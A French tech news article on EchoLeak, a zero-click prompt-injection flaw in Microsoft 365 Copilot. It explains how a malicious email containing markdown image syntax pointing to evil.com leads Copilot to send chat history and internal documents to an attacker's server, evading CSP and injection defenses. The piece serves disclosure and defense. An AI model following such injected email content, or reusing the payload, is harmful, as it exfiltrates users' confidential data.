Une faille de sécurité dans l'assistant GenAI pour la suite Microsoft 365 de type zéro clic a été détectée. Un simple courriel peut déclencher silencieusement l'exfiltration de données sensibles de l'entreprise par Copilot sans avertissement et sans action de la part de l'utilisateur.
Les attaques ne nécessitant aucun clic, aucun téléchargement, aucun avertissement mais juste un courriel dans la boîte de réception ne sont pas imaginaires. Les utilisateurs de Microsoft 365 Copilot doivent s'en méfier : une vulnérabilité critique, EchoLeak, donne aux pirates la capacité de voler des données d'entreprise sensibles sans la moindre action de la part de la victime. Découvert par Aim Security, il s'agit de la première attaque zéro clic documentée contre un assistant GenAI, exposant les risques invisibles qui se cachent dans les outils d'intelligence artificielle utilisés tous les jours. La faille est redoutable, amenant Copilot à répondre à des prompts malveillants pour fouiller dans les fichiers internes et envoyer des données confidentielles à l'extérieur de l'entreprise tout en échappant aux défenses de sécurité de Microsoft, selon le billet de blog de l'entreprise.
« Il s'agit d'une véritable militarisation de la force principale de l'IA, la compréhension du contexte, contre elle-même », alerte Abhishek Anant Garg, analyste chez QKS Group. « La sécurité des entreprises se heurte à des difficultés car elle est conçue pour des codes malveillants, et non pour un langage qui semble inoffensif mais qui agit comme une arme. Ce type de trou de sécurité représente une menace importante », a averti Nader Henein, vice-président analyste chez Gartner. « Compte tenu de la complexité des assistants IA et des services basés sur RAG, ce n'est certainement pas la dernière que nous verrons. »
Zoom sur le mécanisme d'exploitation d'EchoLeak
EchoLeak exploite la capacité de Copilot à traiter à la fois des données internes fiables (comme les courriels, les chats Teams et les fichiers OneDrive) et des données externes non fiables, comme les courriels entrants. L'attaque commence par un mail malveillant contenant une syntaxe markdown spécifique, comme ![Image alt text][ref][ref] : https://www.evil.com?param= ». Lorsque Copilot analyse automatiquement le courrier électronique en arrière-plan pour se préparer aux requêtes de l'utilisateur, il déclenche une requête du navigateur qui envoie des données sensibles, telles que l'historique des conversations, les coordonnées de l'utilisateur ou des documents internes, au serveur de l'attaquant. La chaîne d'exploitation s'articule autour de trois vulnérabilités, dont une redirection ouverte dans la politique de sécurité du contenu (CSP) de Microsoft, qui fait confiance à des domaines tels que Teams et SharePoint. Cela permet aux attaquants de déguiser des requêtes malveillantes en requêtes légitimes, contournant ainsi les défenses du fournisseur contre les attaques par injection de texte croisé (XPIA).
« EchoLeak met en évidence la fausse sécurité des déploiements progressifs de l'IA », note M. Garg. Aim Security classe cette faille comme une « violation du périmètre du LLM », où des prompts non fiables manipulent l'IA pour qu'elle accède à des données en dehors de son champ d'application prévu. « Les attaquants peuvent référencer le contenu d'autres parties du contexte LLM pour extraire des informations sensibles, transformant la capacité de synthèse de l'IA en un vecteur d'exfiltration de données », a déclaré M. Garg. Les chercheurs ont également découvert d'autres faiblesses similaires, ce qui laisse supposer que d'autres systèmes d'intelligence artificielle utilisant la même technologie pourraient être menacés. Microsoft a déclaré avoir corrigé le problème, confirmant qu'aucun client n'était affecté et qu'aucune attaque réelle n'avait eu lieu.
Des risques au-delà de Microsoft
« EchoLeak marque le passage à des architectures fondées sur l'hypothèse de la compromission », a déclaré M. Garg. « Les entreprises doivent désormais supposer qu'une injection prompte de l'adversaire se produira, ce qui fait de la surveillance comportementale en temps réel et de la modélisation des menaces spécifiques à l'agent des exigences existentielles. » L'IA devenant un élément essentiel du lieu de travail, les analystes préconisent une validation robuste des entrées et une isolation des données. M. Henein a mis en garde contre les attaques ciblées telles que « l'envoi d'un courriel à un directeur financier pour voler des données sur les bénéfices avant leur divulgation », qui sont particulièrement préoccupantes.
Tout système d'IA fondé sur la génération assistée par récupération (RAG) peut être menacé s'il traite des entrées externes en même temps que des données internes sensibles. Les défenses traditionnelles telles que les balises DLP échouent souvent à empêcher de telles offensives et peuvent nuire à la fonctionnalité de Copilot lorsqu'elles sont activées, a expliqué M. Garg. « La faille prouve que les périmètres traditionnels n'ont pas de sens lorsque l'IA peut être manipulée pour violer les limites par le biais d'entrées apparemment innocentes. » Pour des secteurs comme la banque, la santé et la défense, ces outils de productivité peuvent devenir de puissants mécanismes d'exfiltration. « Les DSI doivent désormais concevoir des systèmes d'IA en supposant qu'ils sont autonomes sur le plan de l'adversité », a déclaré M. Garg. « Chaque agent est une fuite de données potentielle et doit faire l'objet d'une validation par une red team avant d'être mis en production. »
Repenser la sécurité de l'IA
EchoLeak montre que l'IA d'entreprise n'est pas à l'abri d'une compromission silencieuse, et que sa sécurisation ne se résume pas à l'application de correctifs. « Les agents d'IA exigent un nouveau paradigme de protection », a déclaré M. Garg. « La sécurité de l'exécution doit être la norme minimale viable. » Ce trou de sécurité révèle également des problèmes structurels plus profonds dans l'IA moderne : l'IA agentique souffre d'un effondrement du contexte car selon l'analyste de QKS Group elle mélange des données dans différents domaines de sécurité et ne peut pas faire la distinction entre ce à quoi elle peut accéder et ce à quoi elle devrait accéder, ce qui transforme la synthèse en escalade de privilèges. Alors que la surface d'attaque de l'IA s'étend, EchoLeak prouve que même les systèmes les plus sophistiqués peuvent être militarisés en exploitant la logique propre de l'IA. « Pour l'instant les RSSI devraient avoir confiance, mais vérifiez et réfléchissez à deux fois avant de laisser l'IA lire dans les boîtes de réception », conclut M. Garg.
Suivez-nous